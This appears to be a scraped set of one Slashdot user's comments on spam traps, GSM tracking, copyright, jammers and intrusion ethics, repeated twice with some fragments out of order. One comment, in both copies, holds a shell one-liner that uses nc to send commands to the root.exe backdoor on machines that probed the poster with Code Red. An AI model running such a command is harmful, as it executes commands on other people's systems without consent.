I mean, since fingerprints cannot be conclusive anymore, I foresee our politicians with moral fibers of steel pushing for more surveillance. They will also be pushing for a whole new set of copyright laws, giving governments exclusive copyrights on their citizens' fingerprints. Unauthorized copying or publishing of your own fingerprints will be severely punishable!
Why do you automatically assume that I support piracy because I question the ethics of the RIAA and their cronies?...
If someone has a P2P client running and the port open, that implies that they are allowing data to be shared. Leech the hell out of their bandwidth so that no pirates can get any.
Why do you automatically assume that P2P clients are only used for piracy? Most of their users seem to use them for sharing users, true, but just like not all MP3's are illegal, not all P2P clients are used for piracy.
Not exactly the same thing as the article is about, but still related: My mailserver is properly secured and refuses to relay anything except legitimate mail (i.e. it will accept incoming mail for users on the domains it serves and it only relays mail to the outside world when it's from a predefined set of internal machines). There are plenty of spammers trying to convince my mailserver to send their spam to other people, but all get a nice "relaying denied" message and a couple of lines in my maillog.
I think it's a safe bet all relaying attempts originating from the outside of my network are spammers. The information in the maillog about denied relaying attempts should give an accurate list of IP-numbers used by spammers.
Doesn't this give some interesting opportunities? Creating spamtrap daemons that listen on servers that aren't mailservers (so the fact the behave similar to a real mailserver and listen to the same TCP port is just a coincidence). Those server should be unlisted, not have any DNS records pointing at them being MX for any domains, etc. The only way to find them should be be randomly scanning an IP range. In that case the only people using them would be spammers trying to abuse random mailservers and it would be pretty safe to have the fake mailserver pretend to accept the mail, wait a while, try to gobble up some resources of the spammer, and finally dumping the spam-attempt to/dev/null and telling the spammer what he or she wants to hear: I have delivered your junk. The logs would prove useful, the spam is prevented. Happy happy, joy joy.
The biggest disadvantage would be that such a fake relaying server would probably trigger some of the open-relay scanners (although the clueful scanners would wait until a message is actually received). Hmmm, spammers could do the same, really probing a mailrelay before trying to use it...
Anyway, it would cost spammers more and more effort and probably annoy the hell out of them, which is a Good Thing.
This is where BitMover is sitting. Developers are using their software to assist in developing their competition and doing it in violation of their licensing agreement.
So it would be perfectly reasonable for the GCC folks to decide you can't use gcc for developing any software that will not be placed under the GPL?
In that case I think I might run into trouble when I want to recompile the kernel on my FreeBSD box... Or would that be GNU/FreeBSD?:-)
Re:Fowarding this to your boss, good idea?
on
Sysadmin Day. Yay.
·
· Score: 1
Well, at the end of Sysadmin Appreciation Day, I have received neither presents nor a single word of appreciation. A little "Thank you" would have sufficed, especially after the hint I dropped. It would have taken them less than five minutes to write a little note and would have cost them nothing.
A little addendum to that: Saturday morning somebody rang the doorbell: breakfast service. It seems all sysadmins at the company I work for have gotten a breakfast.
The companywide mailinglist now buzzes with happy sysadmins telling all how great it feels to be appreciated!
Re:Fowarding this to your boss, good idea?
on
Sysadmin Day. Yay.
·
· Score: 1
I want to hear if someone fowarded a Sysadmin day story to his boss to bring some awareness and got a positive or negative reply/feedback in return or no answers at all?:)
Actually, I did so yesterday: I forwarded news items on Sysadmin Appreciation Day to the mailinglist of the IT company I work for (which consists of a couple of management and office staff and a lot of sysadmins, mostly unix, but also some netadmins and DBAs). Every person in the company gets messages submitted to that mailinglist, including the boss.
The only response I got was a message from the marketing manager joking about presents and confirming the message was understood.
Apparantly it wasn't, because although receiving presents would be nice, all I really needed was a simple: "Thank you for all the time and effort you spend to do your work as good as you can.We know all you guys and girls are working hard and we really appreciate it!".
Well, at the end of Sysadmin Appreciation Day, I have received neither presents nor a single word of appreciation. A little "Thank you" would have sufficed, especially after the hint I dropped. It would have taken them less than five minutes to write a little note and would have cost them nothing.
They did make a fuss about Secretaries Appreciation Day, but I guess even in an IT company technicall staff is overlooked.
I must admit I am pretty disappointed and I am sure I will mention this at my yearly employee review.
The GSM network is able to calculate locations of individual phones quite nicely without GPS.
First of all, since it's a network divided in cells, it's always possible to tell in which cell an individual phone is. Sizes of cells differ, but I believe the maximum radius of a cell was something about 35km. In urban surroundings cells are usually considerably smaller.
That's not all...
If I recall correctly (I am really not an expert on this, but I'll try to write down some things I've read a while ago), GSM uses some sort of Time Division Multiple Access system. This simply means multiple phones can transmit data on shared radio frequencies by waiting until it's their turn to transmit. The timing of when to transmit becomes pretty important to prevent phones accidently jamming eachother. The distance of the mobile unit to the base station has to be taken into account because this distance can be translated into the a delay between the data being transmitted and the moment it arrives at the base station. To compensate for this, the phone calculates a "timing advance" delay.
I think the acuracy of this is about 500 meters.I am not sure if you can use this to triangulate a position in the system. If a mobile unit would scan channels on multiple base stations and calculates the Timing Advance for each of those (which it should do if it wants to use the channels for transmitting), then triangulation would be possible and by combining more data the accuracy would improve as well.
It's not GPS but good enough for most purposes and since it's a necessary part of the system, it's already usable and it's impossible to remove that "feature" from your phone... With or without GPS-enabled GSM: if you don't want to located with your GSM phone TURN IT OFF (highly recommendable in theatres,cinemas, meetings, restaurants, etc, by the way).
Interesting question: would it be possible to write a Java applet to retrieve the TA's and do something useful with a list of base stations and those TA's?
Excuse me, being able to get on the Internet and owning a CD-writer may have been enough for being labeled "tech-savvy" half a decade ago. Nowadays being able to find the powerswitch on your computer and clicking on a few buttons is all the technical capacity you need to download and burn.
I take offense in "tech-savvy" being used in such an indiscriminate manner! I'm also quite unhappy about the implicit message, which seems to be "most tech-savvy people are thieves".
But then again, an attitude like Moby shows explains a lot about the music business in general. Some sort of distorted paranoid view of the world in which everybody tries to steal their work.
Err. how do you know it's crap if you didn't buy it and listen? It's the album after the crap one that is meant to suffer
How come everybody simply assumes people are stealing music?
I could have listened to the album in the store (just as I could have in the "old days" when there were no CDs). I could have listened to the album because a friend already bought it. At my current workplace people sometimes put a CD in the player and play it loudly.
Shame on me for listening to an album before paying a lot of money for it!:-) Maybe you buy albums without knowing what's on them, most other people like to know what they're paying for.
It's not necessary to copy an album to get to hear it before you buy it. It's not necessary now, and it never was before.
Next time I go to the shop to buy a CD or DVD I will have to show my ID which will get registered? Maybe give a sample of my DNA? Or a license agreement signed in blood?
When I give sell or give away any of my CDs or DVDs I will have to inform some representative of the music industries there has been a change of ownership?
How long will it take before musical instruments are being forbidden? Their sole purpose is to play music and most of the music being played may in fact be reproductions!
"Sir, you are violating copyrights. Put down that saxophone and step away from it! Do not play another note or we WILL shoot you!"
Most people on slashdot are quite aware of the danger ESD poses to expensive electronic components. I would feel a lot safer with my expensive laptop tucked away in a bag that is lined with fine conductive mesh.
There is one other nice thing about constructions like that: they block RF emissions.:-)
I still have to figure out what to do with tagged clothing... I don't fancy walking around in something that closely resembles chainmail (except when I also get to wield a sword and a shield).
Why would any admin put their database server out on the open internet, exposed to this anyway? Databases should be kept behind firewalls, where it's safe.
Safe?
Actually, I recall a lot of statistics indicating there is a considerable number of attacks on servers originating from INSIDE the firewall. Done by employees.
Mind you, the servers at the company I work for are doubly firewalled (outside and inside), but people still need to use the databases and other services so there need to be some holes in the internal firewall, potentially making the servers vulnerable for attacks. Despite the firewalls there are still a lot of things to worry about...
It would be nice to have a law passed that explicitly made it okey-dokey for people to merely inform a Trojaned luser of their situation, so long as no harm was done.
I don't think that law is needed. I don't see any reason why people informing trojaned lusers cannot do that safely. I have got countless Code Red probes in my Apache logs and have seriously thought about trying to warn those people (it's just there are too many of those).
There's no way that could be illegal.
I won't be trying to "verify" if the root.exe exploit is available on those machines, since that could give me some serious trouble of someone were to pursue a claim against me.
No matter what my intentions are, that would be gaining unlawful access to someone else's machine.
The problem with your statement "(...) so long as no harm was done" is hard to objectively maintain.
Suppose a server I am sysadmin of has a security hole. You're trying to help me and being a white hat hacker you enter my machine and take a good look around and after doing so you create a nice summary of problems and even the necessary fixes.
At first sight, that really is commendable.
However, since I don't know you or your intentions can I safely assume you ment no harm and did no evil things to my machine? Should I take your word for it? For all I know you're just helping me to patch up my machine so no other evil hackers get in and you are the only one that is able to get into my now mostly-secure-but-now-backdoored-machine.
The consequence of you trying to help me is that I would have to retrace all your actions on my machine, which might not have been necessary if you didn't try to "help" me by gaining access to my machine without getting asking me in advance.
Surely I'd have to do a full security audit anyway, but now there is more information in the logs to be checked out.
No matter what your intentions are and how stupidly I misconfigured my machine, your attempt to help me just cost me a whole lot of extra time and downtime.
Informing people is fine and totally legal. Gaining access to their machines without their consent is illegal and rightfully so, as far as I'm converned.
The law I would like to see is one that holds people accountable for problems caused by those people not securing their machines (Code Red anyone... think of all the bandwidth wasted by that little prank). Better still, don't make it a law, ISPs could take it up in their conditions they are allowed to pull the plug when such problems aren't fixed within a certain period!
Although I think his intent should be taken into account and I think he should have been thanked for notifying pdfn.com, I also think it West should have been aware of the risk.
If on Feb. 1st Brian West realized there was no authentication required to edit any file on the site, that would have been enough to warn somebody. Yet he felt it necessary to "test" the hole one day later.
Actually testing the hole wasn't a smart thing to do. There was no need to and no matter how you look at it, it is illegal. Therefore if the site's owner is overly paranoid they can, and probably will, call the authorities.
If a ground floor window is unlocked and you climb into a building through it, you can expect some trouble over it, Saying "I was just verifying if you got a security hole" doesn't mean you didn't unlawfully enter a building.
Don't get me wrong here, I don't think Brian West had anything malicious in mind when he verified the security hole and I am really amazed the way this whole incident turned out, but I still think he shouldn't have made use of the security hole.
There are some serious paranoid people out there and there's always a chance of someone feeling threatened and doing something stupid.
The siteowner's reaction is not too smart, but I really don't understand why the FBI agents came down on West the way they did. They should have realized West was just trying to help pdfn.com and they shouldn't be getting into the "eek, an Evil Hacker just invaded this website" mode...
But then, this isn't really the first time this sort of scenario happened and people don't seem to learn from that.
Remotely disabling root.exe justifiable?
on
Code Red Back For More
·
· Score: 2, Informative
I'm still doubting if I will run something like this on my machines:
In theory (I haven't tested it yet) this should rename the root.exe to something else, at least disabling that particular exploit on the machine.
Messing with other people's machines is a Bad Thing(tm) as far as I'm concerned. On the other hand, if people can't be bothered with keeping their software up to date and are causing inconvenience for other people...
This root.exe might be a stepup for causing even more problems at a later time!
Argh, that poses a bit of a moral dilemma for me...
Re:Maybe genuinely secure laptops make more sense.
on
Laptop Lojack?
·
· Score: 1
I've always learned that you ought to have backups of important information.
If the data stored on the laptop is important enough to attempt to retrieve the laptop, I think it's quite a stupid mistake not to have backups!
After all, there could be hardware failures or the owner of the laptop could accidently drop it, then a bus could drive over it after which it could be flung into a nearby river!
You wouldn't believe the amount of damage a family of crabs could do to a submerged laptop!
You know what we really need? Business card size disposable computers, with a nice little color LCD, and enough power to run a little kiosk-type browser. The technology probably isn't too far off..
Not exactly disposable (quite a pricy toy in fact) and not nearly flexible enough, but still worth a look: Rex
But wouldn't we geeks just *love* to get our hands on RECORDABLES of the same size!!!
Finally we can have some high-res pictures of our loved ones in our wallets (140MB... hmmm, quite a lot of loved ones, family, coworkers, pets, pictures of computers and whatever you want to take with you):-)
The rare occasions I need to ssh from a windows machine I use PuTTY.
The main reason I like it is because it's just one.exe file. I always find when I'm in need of ssh there is no ssh-client installed on the machine I'm working on... PuTTY doesn't waste my time with fancy installshields: you download it and you start it. That's it.
I must admit most of the time I'm working on unix machines, PuTTY is just to fill the gap...:-)
Actually that is something different. The HERF gun puts out enough energy in one pulse to interfere with the electronics inside the target, causing it to malfunction.
The phonekiller you're mentioning transmits a lowpower signal on the frequencies used by the phone making it impossible for it to communicate with the telecom provider. The phone itself keeps on functioning just fine, but it's unable to reach the official stations to make a call.
I even heard the really cool jammers can be programmed to put messages on the phone's display (normally the provider's name is put on the display, but since a jamming device drowns the original signal "creative" messages are possible as well).
I think schools (or other places where they use metal detectors) should be more affraid of people using HERF guns to disable the detection equipment in order circumvent security.
Let's face it: there is probably a very good reason for ACs here on Slashdot, it is probably so that 1)people without a login (or too lazy to login) can still participate in discussions, and 2)some of us may want to say something that could could be detrimental to ourselves, possibly even costing jobs or worse.
First of all: I think anonymity on/. is a Good Thing, but I don't agree with the reasons you give for people posting as AC. Being too lazy to login? Come on, typing two words (loginname and password) isn't that hard, is it? If that is too much of an effort, is that post really necessary? Your second point is the necessity of being anonymous because of real-life implications. Well I think both of us ("smasch" and "rnt") are reasonably anonymous. We both have chosen not to put our emailaddress or homepage on top of our posts.
I know there are times when this relative anonymity is not enough, because posts I make can be attributed to this rnt-slashdot-person and people can read my posting history and see what a nice and intelligent person I am (or asshole, opinions may differ, though personally I like the first option better)... That doesn't bother me, but some people might not like that.
For people who want to post anonymously but not with the AC default score of 0 an option to post as Deliberately Concealed (DC... grin) could be a solution. Not even your slashdot name is revealed, but moderating applies to your karma because internally the/. system knows who you are. Good posts are rewarded, bad posts punished. DC posts rank higher than AC posts and everybody is happy!
In that situation people who *still* feel the need to post as AC are a bit suspicious if you ask me... It seems like in that case it's not as much a matter of wanting to be anonymous, but a matter of not wanting to be accountable for their posts!
I can understand that some people have the need to say things anonymous. But I like being an individual and being recognized and I also like being able to recognize other people saying smart, funny, silly, or stupid things.
Hmmm, it seems my conclusion is that if there is a DC-like posting mode mostly troll-like persons would want to post as AC. So scrutinize AC posts! Registering as a user and logging in isn't that much of a hassle... and it's worth it!
Hack-Tic (a dutch hacker magazine) published in 1992 an article about eavesdropping on telephones that are on-hook (unfortunately the article is written in dutch, but you're probably more interested in the schematics at the end of the article anyway).
I believe the technical term is high-frequency flooding, but IANAEE[0].
The phones on which the technique worked were in fact the older models that do use an actual physical switch. The vulnerable phones used a switch that contained several metal strips.
Basically it works like this: instead of a direct current the phone is fed a high-frequency alternating current. Because of the high frequency the contacts of the switch will act like a capacitor, allowing a current to run through the circuit. The microphone does work that way! I have seen it work and I was impressed. Audioquality wasn't quite good, but the demonstration did something supposedly impossible so hi-fi audio wasn't important, the conversation in the room was intelligible.
(quite funny: the dutch telecom provider first denied it was possible, but soon started to sell kits to prevent eavesdropping using this technique)
On modern telephones this wouldn't work I guess, simply because the physical switch isn't the only thing inbetween the microphone and the phoneline (amplifiers, filters, whatever...).
it's in the MS "people"'s best interest to attack their own box
But the same goes for the linux guys...
I honestly believe the Linux box is being battered by people using linux.
First of all I know more about linux and *nix in general than about NT. The linuxbox makes a more attractive target that way. That argument probably goes for many of the linux people. Why would I try to break an os I don't use? Just to prove it's unstable? I'm not that kind of guy and frankly, I don't really care.
Yes, I am a bit biased... so I'd rather see the linux ppc being really put to the test.
I believe ESR wrote something open source worked because people were "scratching personal itches".
Linux security is *my* personal itch, Windows security is someone else's.
I'll scratch your back if you scratch mine... The Halloween documents may be a clear indication that MS is not about to scratch Linux' back.
But on the distribution of attacks: I expect the D.O.S. attacks being mostly cross-platform (linux kiddies trying to nuke win2k and windows kiddies trying to nuke linuxppc), while the cluefull attacks are being done by people who know a bit about the os they're trying to get into.
a couple of the postings have pointed out that this could turn out to be a kind of an almost-competition between linuxppc and the W2K bug-- if one gets hacked and the other doesn't, that means that that OS is more secure.
I don't quite agree... in the August 4th part 3 log entry on crack.linuxppc.org it is mentioned that portmap, sendmail, and ftp will be turned on eventually.
So now we have a win2k machine that is supposed to be secured to the max on one side of the arena and a linuxppc machine which will be gradually opened up on the other side.
Clever move of linuxppc because first of all turning on more services keeps people interested. Let people have their fun! Having fun and learning a thing or two on the way. What more do we want?
Another benefit could be that the two machines cannot be compared that way: The linuxppc machine is willingly set up in a way that increases the risks of anyone getting in.
So if the linuxppc machine gets compromised it is not a big deal, it is more or less intended. That makes it kind of hard to brag that the win2k box remained intact (in some sense anyway) while the linuxppc has been hacked.
Besides that: there is much more to learn from a box that does get broken into. Something to do with "learning from mistakes" I believe... and I quite like the idea of other services getting a nice pounding too.
Slashdot Mirror
Why do you automatically assume that I support piracy because I question the ethics of the RIAA and their cronies? ...
If someone has a P2P client running and the port open, that implies that they are allowing data to be shared. Leech the hell out of their bandwidth so that no pirates can get any.
Why do you automatically assume that P2P clients are only used for piracy? Most of their users seem to use them for sharing users, true, but just like not all MP3's are illegal, not all P2P clients are used for piracy.
Not exactly the same thing as the article is about, but still related: My mailserver is properly secured and refuses to relay anything except legitimate mail (i.e. it will accept incoming mail for users on the domains it serves and it only relays mail to the outside world when it's from a predefined set of internal machines). There are plenty of spammers trying to convince my mailserver to send their spam to other people, but all get a nice "relaying denied" message and a couple of lines in my maillog.
/dev/null and telling the spammer what he or she wants to hear: I have delivered your junk. The logs would prove useful, the spam is prevented. Happy happy, joy joy.
I think it's a safe bet all relaying attempts originating from the outside of my network are spammers. The information in the maillog about denied relaying attempts should give an accurate list of IP-numbers used by spammers.
Doesn't this give some interesting opportunities?
Creating spamtrap daemons that listen on servers that aren't mailservers (so the fact the behave similar to a real mailserver and listen to the same TCP port is just a coincidence). Those server should be unlisted, not have any DNS records pointing at them being MX for any domains, etc.
The only way to find them should be be randomly scanning an IP range.
In that case the only people using them would be spammers trying to abuse random mailservers and it would be pretty safe to have the fake mailserver pretend to accept the mail, wait a while, try to gobble up some resources of the spammer, and finally dumping the spam-attempt to
The biggest disadvantage would be that such a fake relaying server would probably trigger some of the open-relay scanners (although the clueful scanners would wait until a message is actually received). Hmmm, spammers could do the same, really probing a mailrelay before trying to use it...
Anyway, it would cost spammers more and more effort and probably annoy the hell out of them, which is a Good Thing.
This is where BitMover is sitting. Developers are using their software to assist in developing their competition and doing it in violation of their licensing agreement.
:-)
So it would be perfectly reasonable for the GCC folks to decide you can't use gcc for developing any software that will not be placed under the GPL?
In that case I think I might run into trouble when I want to recompile the kernel on my FreeBSD box... Or would that be GNU/FreeBSD?
Well, at the end of Sysadmin Appreciation Day, I have received neither presents nor a single word of appreciation.
A little "Thank you" would have sufficed, especially after the hint I dropped.
It would have taken them less than five minutes to write a little note and would have cost them nothing.
A little addendum to that: Saturday morning somebody rang the doorbell: breakfast service. It seems all sysadmins at the company I work for have gotten a breakfast.
The companywide mailinglist now buzzes with happy sysadmins telling all how great it feels to be appreciated!
I want to hear if someone fowarded a Sysadmin day story to his boss to bring some awareness and got a positive or negative reply/feedback in return or no answers at all? :)
Actually, I did so yesterday: I forwarded news items on Sysadmin Appreciation Day to the mailinglist of the IT company I work for (which consists of a couple of management and office staff and a lot of sysadmins, mostly unix, but also some netadmins and DBAs). Every person in the company gets messages submitted to that mailinglist, including the boss.
The only response I got was a message from the marketing manager joking about presents and confirming the message was understood.
Apparantly it wasn't, because although receiving presents would be nice, all I really needed was a simple: "Thank you for all the time and effort you spend to do your work as good as you can.We know all you guys and girls are working hard and we really appreciate it!".
Well, at the end of Sysadmin Appreciation Day, I have received neither presents nor a single word of appreciation.
A little "Thank you" would have sufficed, especially after the hint I dropped.
It would have taken them less than five minutes to write a little note and would have cost them nothing.
They did make a fuss about Secretaries Appreciation Day, but I guess even in an IT company technicall staff is overlooked.
I must admit I am pretty disappointed and I am sure I will mention this at my yearly employee review.
The GSM network is able to calculate locations of individual phones quite nicely without GPS.
First of all, since it's a network divided in cells, it's always possible to tell in which cell an individual phone is. Sizes of cells differ, but I believe the maximum radius of a cell was something about 35km. In urban surroundings cells are usually considerably smaller.
That's not all...
If I recall correctly (I am really not an expert on this, but I'll try to write down some things I've read a while ago), GSM uses some sort of Time Division Multiple Access system.
This simply means multiple phones can transmit data on shared radio frequencies by waiting until it's their turn to transmit.
The timing of when to transmit becomes pretty important to prevent phones accidently jamming eachother. The distance of the mobile unit to the base station has to be taken into account because this distance can be translated into the a delay between the data being transmitted and the moment it arrives at the base station. To compensate for this, the phone calculates a "timing advance" delay.
I think the acuracy of this is about 500 meters.I am not sure if you can use this to triangulate a position in the system. If a mobile unit would scan channels on multiple base stations and calculates the Timing Advance for each of those (which it should do if it wants to use the channels for transmitting), then triangulation would be possible and by combining more data the accuracy would improve as well.
It's not GPS but good enough for most purposes and since it's a necessary part of the system, it's already usable and it's impossible to remove that "feature" from your phone...
With or without GPS-enabled GSM: if you don't want to located with your GSM phone TURN IT OFF (highly recommendable in theatres,cinemas, meetings, restaurants, etc, by the way).
Interesting question: would it be possible to write a Java applet to retrieve the TA's and do something useful with a list of base stations and those TA's?
Excuse me, being able to get on the Internet and owning a CD-writer may have been enough for being labeled "tech-savvy" half a decade ago.
Nowadays being able to find the powerswitch on your computer and clicking on a few buttons is all the technical capacity you need to download and burn.
I take offense in "tech-savvy" being used in such an indiscriminate manner!
I'm also quite unhappy about the implicit message, which seems to be "most tech-savvy people are thieves".
But then again, an attitude like Moby shows explains a lot about the music business in general. Some sort of distorted paranoid view of the world in which everybody tries to steal their work.
Err. how do you know it's crap if you didn't buy it and listen? It's the album after the crap one that is meant to suffer
:-)
How come everybody simply assumes people are stealing music?
I could have listened to the album in the store (just as I could have in the "old days" when there were no CDs).
I could have listened to the album because a friend already bought it. At my current workplace people sometimes put a CD in the player and play it loudly.
Shame on me for listening to an album before paying a lot of money for it!
Maybe you buy albums without knowing what's on them, most other people like to know what they're paying for.
It's not necessary to copy an album to get to hear it before you buy it. It's not necessary now, and it never was before.
Next time I go to the shop to buy a CD or DVD I will have to show my ID which will get registered?
Maybe give a sample of my DNA? Or a license agreement signed in blood?
When I give sell or give away any of my CDs or DVDs I will have to inform some representative of the music industries there has been a change of ownership?
How long will it take before musical instruments are being forbidden? Their sole purpose is to play music and most of the music being played may in fact be reproductions!
"Sir, you are violating copyrights. Put down that saxophone and step away from it! Do not play another note or we WILL shoot you!"
Most people on slashdot are quite aware of the danger ESD poses to expensive electronic components. I would feel a lot safer with my expensive laptop tucked away in a bag that is lined with fine conductive mesh.
:-)
There is one other nice thing about constructions like that: they block RF emissions.
I still have to figure out what to do with tagged clothing... I don't fancy walking around in something that closely resembles chainmail (except when I also get to wield a sword and a shield).
Why would any admin put their database server out on the open internet, exposed to this anyway? Databases should be kept behind firewalls, where it's safe.
Safe?
Actually, I recall a lot of statistics indicating there is a considerable number of attacks on servers originating from INSIDE the firewall. Done by employees.
Mind you, the servers at the company I work for are doubly firewalled (outside and inside), but people still need to use the databases and other services so there need to be some holes in the internal firewall, potentially making the servers vulnerable for attacks. Despite the firewalls there are still a lot of things to worry about...
It would be nice to have a law passed that explicitly made it okey-dokey for people to merely inform a Trojaned luser of their situation, so long as no harm was done.
I don't think that law is needed. I don't see any reason why people informing trojaned lusers cannot do that safely. I have got countless Code Red probes in my Apache logs and have seriously thought about trying to warn those people (it's just there are too many of those).
There's no way that could be illegal.
I won't be trying to "verify" if the root.exe exploit is available on those machines, since that could give me some serious trouble of someone were to pursue a claim against me.
No matter what my intentions are, that would be gaining unlawful access to someone else's machine.
The problem with your statement "(...) so long as no harm was done" is hard to objectively maintain.
Suppose a server I am sysadmin of has a security hole. You're trying to help me and being a white hat hacker you enter my machine and take a good look around and after doing so you create a nice summary of problems and even the necessary fixes.
At first sight, that really is commendable.
However, since I don't know you or your intentions can I safely assume you ment no harm and did no evil things to my machine? Should I take your word for it? For all I know you're just helping me to patch up my machine so no other evil hackers get in and you are the only one that is able to get into my now mostly-secure-but-now-backdoored-machine.
The consequence of you trying to help me is that I would have to retrace all your actions on my machine, which might not have been necessary if you didn't try to "help" me by gaining access to my machine without getting asking me in advance.
Surely I'd have to do a full security audit anyway, but now there is more information in the logs to be checked out.
No matter what your intentions are and how stupidly I misconfigured my machine, your attempt to help me just cost me a whole lot of extra time and downtime.
Informing people is fine and totally legal. Gaining access to their machines without their consent is illegal and rightfully so, as far as I'm converned.
The law I would like to see is one that holds people accountable for problems caused by those people not securing their machines (Code Red anyone... think of all the bandwidth wasted by that little prank). Better still, don't make it a law, ISPs could take it up in their conditions they are allowed to pull the plug when such problems aren't fixed within a certain period!
Doesn't his intent count for anything?
Although I think his intent should be taken into account and I think he should have been thanked for notifying pdfn.com, I also think it West should have been aware of the risk.
If on Feb. 1st Brian West realized there was no authentication required to edit any file on the site, that would have been enough to warn somebody. Yet he felt it necessary to "test" the hole one day later.
Actually testing the hole wasn't a smart thing to do. There was no need to and no matter how you look at it, it is illegal. Therefore if the site's owner is overly paranoid they can, and probably will, call the authorities.
If a ground floor window is unlocked and you climb into a building through it, you can expect some trouble over it, Saying "I was just verifying if you got a security hole" doesn't mean you didn't unlawfully enter a building.
Don't get me wrong here, I don't think Brian West had anything malicious in mind when he verified the security hole and I am really amazed the way this whole incident turned out, but I still think he shouldn't have made use of the security hole.
There are some serious paranoid people out there and there's always a chance of someone feeling threatened and doing something stupid.
The siteowner's reaction is not too smart, but I really don't understand why the FBI agents came down on West the way they did. They should have realized West was just trying to help pdfn.com and they shouldn't be getting into the "eek, an Evil Hacker just invaded this website" mode...
But then, this isn't really the first time this sort of scenario happened and people don't seem to learn from that.
I'm still doubting if I will run something like this on my machines:
/var/log/httpd/access_log|gawk '/default.ida/ {system("echo GET /scripts/root.exe?/c+ren+root.exe+root.exe-worm HTTP/1.0|nc "$1" 80")}'
tail -f
In theory (I haven't tested it yet) this should rename the root.exe to something else, at least disabling that particular exploit on the machine.
Messing with other people's machines is a Bad Thing(tm) as far as I'm concerned. On the other hand, if people can't be bothered with keeping their software up to date and are causing inconvenience for other people...
This root.exe might be a stepup for causing even more problems at a later time!
Argh, that poses a bit of a moral dilemma for me...
I've always learned that you ought to have backups of important information.
If the data stored on the laptop is important enough to attempt to retrieve the laptop, I think it's quite a stupid mistake not to have backups!
After all, there could be hardware failures or the owner of the laptop could accidently drop it, then a bus could drive over it after which it could be flung into a nearby river!
You wouldn't believe the amount of damage a family of crabs could do to a submerged laptop!
You know what we really need? Business card size disposable computers, with a nice little color LCD, and enough power to run a little kiosk-type browser. The technology probably isn't too far off..
Not exactly disposable (quite a pricy toy in fact) and not nearly flexible enough, but still worth a look: Rex
These oddly cut mini CDROMs aren't really new...
:-)
But wouldn't we geeks just *love* to get our hands on RECORDABLES of the same size!!!
Finally we can have some high-res pictures of our loved ones in our wallets (140MB... hmmm, quite a lot of loved ones, family, coworkers, pets, pictures of computers and whatever you want to take with you)
The main reason I like it is because it's just one .exe file. I always find when I'm in need of ssh there is no ssh-client installed on the machine I'm working on...
PuTTY doesn't waste my time with fancy installshields: you download it and you start it. That's it.
I must admit most of the time I'm working on unix machines, PuTTY is just to fill the gap... :-)
http://www.chiark.greenend.o rg.uk/~sgtatham/putty.html
There already is a mobile phone killer.
Actually that is something different. The HERF gun puts out enough energy in one pulse to interfere with the electronics inside the target, causing it to malfunction.
The phonekiller you're mentioning transmits a lowpower signal on the frequencies used by the phone making it impossible for it to communicate with the telecom provider. The phone itself keeps on functioning just fine, but it's unable to reach the official stations to make a call.
I even heard the really cool jammers can be programmed to put messages on the phone's display (normally the provider's name is put on the display, but since a jamming device drowns the original signal "creative" messages are possible as well).
I think schools (or other places where they use metal detectors) should be more affraid of people using HERF guns to disable the detection equipment in order circumvent security.
Let's face it: there is probably a very good reason for ACs here on Slashdot, it is probably so that 1)people without a login (or too lazy to login) can still participate in discussions, and 2)some of us may want to say something that could could be detrimental to ourselves, possibly even costing jobs or worse.
/. is a Good Thing, but I don't agree with the reasons you give for people posting as AC. Being too lazy to login? Come on, typing two words (loginname and password) isn't that hard, is it? If that is too much of an effort, is that post really necessary? Your second point is the necessity of being anonymous because of real-life implications. Well I think both of us ("smasch" and "rnt") are reasonably anonymous. We both have chosen not to put our emailaddress or homepage on top of our posts.
/. system knows who you are.
First of all: I think anonymity on
I know there are times when this relative anonymity is not enough, because posts I make can be attributed to this rnt-slashdot-person and people can read my posting history and see what a nice and intelligent person I am (or asshole, opinions may differ, though personally I like the first option better)... That doesn't bother me, but some people might not like that.
For people who want to post anonymously but not with the AC default score of 0 an option to post as Deliberately Concealed (DC... grin) could be a solution. Not even your slashdot name is revealed, but moderating applies to your karma because internally the
Good posts are rewarded, bad posts punished.
DC posts rank higher than AC posts and everybody is happy!
In that situation people who *still* feel the need to post as AC are a bit suspicious if you ask me... It seems like in that case it's not as much a matter of wanting to be anonymous, but a matter of not wanting to be accountable for their posts!
I can understand that some people have the need to say things anonymous. But I like being an individual and being recognized and I also like being able to recognize other people saying smart, funny, silly, or stupid things.
Hmmm, it seems my conclusion is that if there is a DC-like posting mode mostly troll-like persons would want to post as AC. So scrutinize AC posts! Registering as a user and logging in isn't that much of a hassle... and it's worth it!
Hack-Tic (a dutch hacker magazine) published in 1992 an article about eavesdropping on telephones that are on-hook (unfortunately the article is written in dutch, but you're probably more interested in the schematics at the end of the article anyway).
I believe the technical term is high-frequency flooding, but IANAEE[0].
The phones on which the technique worked were in fact the older models that do use an actual physical switch. The vulnerable phones used a switch that contained several metal strips.
Basically it works like this: instead of a direct current the phone is fed a high-frequency alternating current. Because of the high frequency the contacts of the switch will act like a capacitor, allowing a current to run through the circuit. The microphone does work that way!
I have seen it work and I was impressed. Audioquality wasn't quite good, but the demonstration did something supposedly impossible so hi-fi audio wasn't important, the conversation in the room was intelligible.
(quite funny: the dutch telecom provider first denied it was possible, but soon started to sell kits to prevent eavesdropping using this technique)
On modern telephones this wouldn't work I guess, simply because the physical switch isn't the only thing inbetween the microphone and the phoneline (amplifiers, filters, whatever...).
I hope this helps...
[0] I am not an electrical engineer...
it's in the MS "people"'s best interest to attack their own box
But the same goes for the linux guys...
I honestly believe the Linux box is being battered by people using linux.
First of all I know more about linux and *nix in general than about NT. The linuxbox makes a more attractive target that way. That argument probably goes for many of the linux people.
Why would I try to break an os I don't use? Just to prove it's unstable? I'm not that kind of guy and frankly, I don't really care.
Yes, I am a bit biased... so I'd rather see the linux ppc being really put to the test.
I believe ESR wrote something open source worked because people were "scratching personal itches".
Linux security is *my* personal itch, Windows security is someone else's.
I'll scratch your back if you scratch mine...
The Halloween documents may be a clear indication that MS is not about to scratch Linux' back.
But on the distribution of attacks:
I expect the D.O.S. attacks being mostly cross-platform (linux kiddies trying to nuke win2k and windows kiddies trying to nuke linuxppc), while the cluefull attacks are being done by people who know a bit about the os they're trying to get into.
a couple of the postings have pointed out that this could turn out to be a kind of an
almost-competition between linuxppc and the W2K bug-- if one gets hacked and the
other doesn't, that means that that OS is more secure.
I don't quite agree... in the August 4th part 3 log entry on crack.linuxppc.org it is mentioned that portmap, sendmail, and ftp will be turned on eventually.
So now we have a win2k machine that is supposed to be secured to the max on one side of the arena and a linuxppc machine which will be gradually opened up on the other side.
Clever move of linuxppc because first of all turning on more services keeps people interested. Let people have their fun! Having fun and learning a thing or two on the way. What more do we want?
